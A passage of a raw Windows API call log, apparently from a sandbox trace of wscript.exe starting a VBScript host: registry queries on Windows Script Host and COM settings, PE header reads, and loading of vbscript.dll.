Buffer => \x05\x00\x0b\x03\x10\x00\x00\x00H\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00xW4\x124\x12\xcd\xab\xef\x00\x01#Eg\x89\xab\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x000000d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile |
Buffer => \x05\x00\x0c\x03\x10\x00\x00\x00D\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\xfc$\x00\x00\x0c\x00\PIPE\lsass\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x000000d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegCloseKey |
Handle => 0x000000b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Windows Script Host\Settings |
FAILURE | 0x00000002 | |
| 19:40:26,263 | 252 | RegOpenKeyExW |
Handle => 0x000000b8 Registry => 0x80000002 SubKey => Software\Microsoft\Windows Script Host\Settings |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegQueryValueExW |
Handle => 0x000000b8 DataLength => 1024 ValueName => LogSecuritySuccesses Type => 1306108 |
FAILURE | 0x00000002 | |
| 19:40:26,263 | 252 | RegCloseKey |
Handle => 0x000000b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | LdrGetDllHandle |
ModuleHandle => 0x01000000 FileName => C:\WINDOWS\system32\wscript.exe |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | LdrLoadDll |
Flags => 1308256 BaseAddress => 0x01000000 FileName => C:\WINDOWS\system32\wscript.exe |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | LdrGetDllHandle |
ModuleHandle => 0x01000000 FileName => C:\WINDOWS\system32\wscript.exe |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | LdrLoadDll |
Flags => 1306412 BaseAddress => 0x01000000 FileName => C:\WINDOWS\system32\wscript.exe |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegOpenKeyExW |
Handle => 0x000000b8 Registry => 0x80000002 SubKey => Software\Microsoft\Windows Script Host\Settings |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegQueryValueExW |
Handle => 0x000000b8 DataLength => 1024 ValueName => IgnoreUserSettings Type => 1305296 |
FAILURE | 0x00000002 | |
| 19:40:26,263 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Windows Script Host\Settings |
FAILURE | 0x00000002 | |
| 19:40:26,263 | 252 | RegQueryValueExW |
Handle => 0x000000b8 DataLength => 4 ValueName => TrustPolicy Type => 1308408 |
FAILURE | 0x00000002 | |
| 19:40:26,263 | 252 | RegQueryValueExW |
Handle => 0x000000b8 Data => 1\x00\x00\x00 ValueName => UseWINSAFER |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegCloseKey |
Handle => 0x000000b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegCreateKeyExW |
Handle => 0x000000b8 Access => 131097 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows Script Host\Settings |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegQueryValueExW |
Handle => 0x000000b8 DataLength => 4 ValueName => Timeout Type => 1308416 |
FAILURE | 0x00000002 | |
| 19:40:26,263 | 252 | RegQueryValueExW |
Handle => 0x000000b8 Data => 1\x00\x00\x00 ValueName => DisplayLogo |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegCloseKey |
Handle => 0x000000b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegCreateKeyExW |
Handle => 0x000000c8 Access => 131097 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows Script Host\Settings |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegQueryValueExW |
Handle => 0x000000c8 DataLength => 4 ValueName => Timeout Type => 1308416 |
FAILURE | 0x00000002 | |
| 19:40:26,263 | 252 | RegQueryValueExW |
Handle => 0x000000c8 DataLength => 1024 ValueName => DisplayLogo Type => 1305308 |
FAILURE | 0x00000002 | |
| 19:40:26,263 | 252 | RegCloseKey |
Handle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | LdrGetDllHandle |
ModuleHandle => 0x774e0000 FileName => ole32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoCreateInstanceEx FunctionAddress => 0x77500526 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | LdrLoadDll |
Flags => 1307056 BaseAddress => 0x77120000 FileName => oleaut32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtCreateFile |
ShareAccess => 1 FileName => C:\WINDOWS\system32\wscript.exe DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtQueryInformationFile |
FileHandle => 0x000000c8 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile |
FileHandle => 0x000000c8 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile |
Buffer => MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00 FileHandle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile |
FileHandle => 0x000000c8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,263 | 252 | NtReadFile |
Buffer => PE\x00\x00 FileHandle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile |
Buffer => L\x01\x04\x00\x90N>G\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x02\x01 FileHandle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtQueryInformationFile |
FileHandle => 0x000000c8 FileInformation => \x10\x01\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile |
FileHandle => 0x000000c8 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile |
Buffer => .text\x00\x00\x00\xfcs\x01\x00\x00\x10\x00\x00\x00\x80\x01\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00` FileHandle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile |
Buffer => .data\x00\x00\x00\xdc\x04\x00\x00\x00\x90\x01\x00\x00\x10\x00\x00\x00\x90\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\xc0 FileHandle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile |
Buffer => .rsrc\x00\x00\x00\xd0\x94\x00\x00\x00\xa0\x01\x00\x00\xa0\x00\x00\x00\xa0\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00@ FileHandle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtQueryInformationFile |
FileHandle => 0x000000c8 FileInformation => h\x02\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile |
FileHandle => 0x000000c8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,263 | 252 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x04\x00 FileHandle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile |
Buffer => P\x06\x00\x80@\x00\x00\x80 FileHandle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtQueryInformationFile |
FileHandle => 0x000000c8 FileInformation => \x18\xa0\x01\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile |
FileHandle => 0x000000c8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,263 | 252 | NtReadFile |
Buffer => \x03\x00 FileHandle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile |
FileHandle => 0x000000c8 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile |
Buffer => @\x06\x00\x80X\x00\x00\x80 FileHandle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtQueryInformationFile |
FileHandle => 0x000000c8 FileInformation => \xa0\x01\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile |
FileHandle => 0x000000c8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,263 | 252 | NtReadFile |
Buffer => \x07\x00 FileHandle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile |
Buffer => T\x00Y\x00P\x00E\x00L\x00I\x00B\x00 FileHandle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile |
FileHandle => 0x000000c8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,263 | 252 | NtQueryInformationFile |
FileHandle => 0x000000c8 FileInformation => h\x02\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile |
FileHandle => 0x000000c8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,263 | 252 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00 FileHandle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtQueryInformationFile |
FileHandle => 0x000000c8 FileInformation => h\xa0\x01\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile |
FileHandle => 0x000000c8 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile |
Buffer => \x01\x00\x00\x00\xa8\x01\x00\x80 FileHandle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile |
FileHandle => 0x000000c8 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtQueryInformationFile |
FileHandle => 0x000000c8 FileInformation => h\x02\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile |
FileHandle => 0x000000c8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,263 | 252 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 FileHandle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile |
Buffer => \x04\x00\x00p\x04\x00\x00 FileHandle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile |
FileHandle => 0x000000c8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,263 | 252 | NtReadFile |
Buffer => \xd0\xba\x01\x00\xccP\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtQueryInformationFile |
FileHandle => 0x000000c8 FileInformation => \x00`\x02\x00\x00\x00\x00\x00\x00`\x02\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0005 SectionHandle => 0x000000b8 FileHandle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e910 SectionHandle => 0x000000b8 ProcessHandle => 0xffffffff BaseAddress => 0x00e20000 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | LdrLoadDll |
Flags => 1307044 BaseAddress => 0x7e720000 FileName => SXS.DLL |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SxsOleAut32MapConfiguredClsidToReferenceClsid FunctionAddress => 0x7e745c0d ModuleHandle => 0x7e720000 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | CreateThread |
ThreadId => 292 StartRoutine => 0x01002fd4 Parameter => 0x00434aa8 CreationFlags => 0 |
SUCCESS | 0x000000dc | |
| 19:40:26,293 | 292 | GetSystemMetrics |
SystemMetricIndex => 31 |
SUCCESS | 0x00000019 | 2 times |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x000000ee Registry => 0x80000000 SubKey => .vbs |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW |
Handle => 0x000000ee Data => V\x00B\x00S\x00F\x00i\x00l\x00e\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x000000ee |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x000000ee Registry => 0x80000000 SubKey => VBSFile\ScriptEngine |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW |
Handle => 0x000000ee Data => V\x00B\x00S\x00c\x00r\x00i\x00p\x00t\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x000000ee |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x000000ee Registry => 0x80000000 SubKey => VBScript |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x000000f2 Registry => 0x000000ee SubKey => CLSID |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW |
Handle => 0x000000f2 Data => {\x00B\x005\x004\x00F\x003\x007\x004\x001\x00-\x005\x00B\x000\x007\x00-\x001\x001\x00c\x00f\x00-\x00A\x004\x00B\x000\x00-\x000\x000\x00A\x00A\x000\x000\x004\x00A\x005\x005\x00E\x008\x00}\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x000000ee |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x000000ec Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW |
Handle => 0x000000ec Data => 1 ValueName => Com+Enabled |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | LdrLoadDll |
Flags => 1306592 BaseAddress => 0x76fd0000 FileName => CLBCATQ.DLL |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetCatalogObject FunctionAddress => 0x76fd3f78 ModuleHandle => 0x76fd0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x000000ec Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW |
Handle => 0x000000ec Data => 1 ValueName => Com+Enabled |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | LdrLoadDll |
Flags => 1306592 BaseAddress => 0x76fd0000 FileName => CLBCATQ.DLL |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetCatalogObject2 FunctionAddress => 0x76fd4017 ModuleHandle => 0x76fd0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | LdrGetDllHandle |
ModuleHandle => 0x774e0000 FileName => ole32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CLSIDFromOle1Class FunctionAddress => 0x775188b9 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | NtOpenKey |
DesiredAccess => 33554432 KeyHandle => 0x000000f0 ObjectAttributes => \Registry\User\S-1-5-21-1960408961-789336058-1343024091-1003_Classes |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x000000ec Registry => 0x80000002 SubKey => Software\Classes |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x000000f8 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | NtOpenKey |
DesiredAccess => 16 KeyHandle => 0x00000100 ObjectAttributes => \REGISTRY\USER |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000108 Registry => 0x80000002 SubKey => Software\Classes |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | NtOpenKey |
DesiredAccess => 16 KeyHandle => 0x00000110 ObjectAttributes => \REGISTRY\USER |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000118 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000120 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000128 Registry => 0x80000002 SubKey => Software\Classes\CLSID |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000130 Registry => 0x80000002 SubKey => Software\Classes |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000138 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | NtOpenKey |
DesiredAccess => 16 KeyHandle => 0x00000140 ObjectAttributes => \REGISTRY\USER |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000148 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000150 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000158 Registry => 0x80000002 SubKey => Software\Classes\CLSID |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000160 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW |
Handle => 0x00000160 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x00000160 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | LdrGetDllHandle |
ModuleHandle => 0x7c800000 FileName => KERNEL32.DLL |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InitializeCriticalSectionAndSpinCount FunctionAddress => 0x7c80b8b9 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | NtCreateFile |
ShareAccess => 1 FileName => C:\WINDOWS\Registration\R000000000007.clb DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000160 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | NtQueryInformationFile |
FileHandle => 0x00000160 FileInformation => \x00`\x00\x00\x00\x00\x00\x00\xf0W\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | NtSetInformationFile |
FileHandle => 0x00000160 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,293 | 252 | NtReadFile |
Buffer => COM+\x01\x00\x00\x00\x01\x00\x12\x00$\x00\x00\x00\x00\x01\x01\x00c\x00\x00\x00\x00\x00\x00\x01\x01\x00\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00F\x0e\x00\x00\x000\x01\x00\x00\xa0\x03\x00\x003_0\x00\xd0\x04\x00\x00\x0c\x00\x00\x003_1\x00\xdc\x04\x00\x00\x88\x02\x00\x003_2\x00d\x07\x00\x00<\x00\x00\x003_3\x00\xa0\x07\x00\x00\x90\x08\x00\x003_4\x000\x10\x00\x00(\x00\x00\x003_5\x00X\x10\x00\x00(\x00\x00\x003_6\x00\x80\x10\x00\x00(\x00\x00\x003_7\x00\xa8\x10\x00\x00\x88\x10\x00\x003_8\x000!\x00\x00\xa8 \x00\x003_9\x00\xd8*\x00\x00<\x04\x00\x003_10\x00\x00\x00\x00\x14/\x00\x00\x0c\x01\x00\x003_11\x00\x00\x00\x00 0\x00\x00\x1c\x00\x00\x003_12\x00\x00\x00\x00<0\x00\x00\x14\x00\x00\x003_16\x00\x00\x00\x00P0\x00\x00\x90\x0e\x00\x00#Schema\x00\xe0>\x00\x00 FileHandle => 0x00000160 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000160 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW |
Handle => 0x00000160 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x00000160 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000162 Registry => 0x000000f2 SubKey => CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8} |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000162 SubKey => TreatAs |
FAILURE | 0x00000002 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000166 Registry => 0x000000f2 SubKey => |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x00000162 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000162 Registry => 0x00000166 SubKey => CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8} |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x0000016a Registry => 0x00000162 SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW |
Handle => 0x0000016a DataLength => 1000 ValueName => InprocServer32 Type => 1581080 |
FAILURE | 0x00000002 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x0000016a |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000162 SubKey => InprocServerX86 |
FAILURE | 0x00000002 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000162 SubKey => LocalServer32 |
FAILURE | 0x00000002 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x0000016a Registry => 0x00000162 SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW |
Handle => 0x0000016a Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00v\x00b\x00s\x00c\x00r\x00i\x00p\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x0000016a |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000162 SubKey => InprocHandler32 |
FAILURE | 0x00000002 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000162 SubKey => InprocHandlerX86 |
FAILURE | 0x00000002 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000162 SubKey => LocalServer32 |
FAILURE | 0x00000002 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000162 SubKey => LocalServer |
FAILURE | 0x00000002 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x0000016a Registry => 0x00000166 SubKey => CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8} |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW |
Handle => 0x0000016a DataLength => 100 ValueName => AppID Type => 1306384 |
FAILURE | 0x00000002 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x0000016a |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x00000162 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000162 Registry => 0x00000166 SubKey => CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8} |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x00000162 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000162 Registry => 0x00000166 SubKey => CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8} |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x0000016a Registry => 0x00000162 SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW |
Handle => 0x0000016a Data => B\x00o\x00t\x00h\x00\x00\x00 ValueName => ThreadingModel |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x0000016a |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x00000162 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000162 Registry => 0x80000000 SubKey => CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8} |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000162 SubKey => TreatAs |
FAILURE | 0x00000002 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x00000162 |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | LdrLoadDll |
Flags => 1303160 BaseAddress => 0x73300000 FileName => C:\WINDOWS\system32\vbscript.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DllGetClassObject FunctionAddress => 0x7330c102 ModuleHandle => 0x73300000 |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DllCanUnloadNow FunctionAddress => 0x7331efda ModuleHandle => 0x73300000 |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | LdrLoadDll |
Flags => 1303828 BaseAddress => 0x7c800000 FileName => kernel32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetUserDefaultUILanguage FunctionAddress => 0x7c813100 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000160 ObjectAttributes => \Registry\Machine\System\CurrentControlSet\Control\Nls\Locale |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000168 ObjectAttributes => \Registry\Machine\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | NtOpenKey |
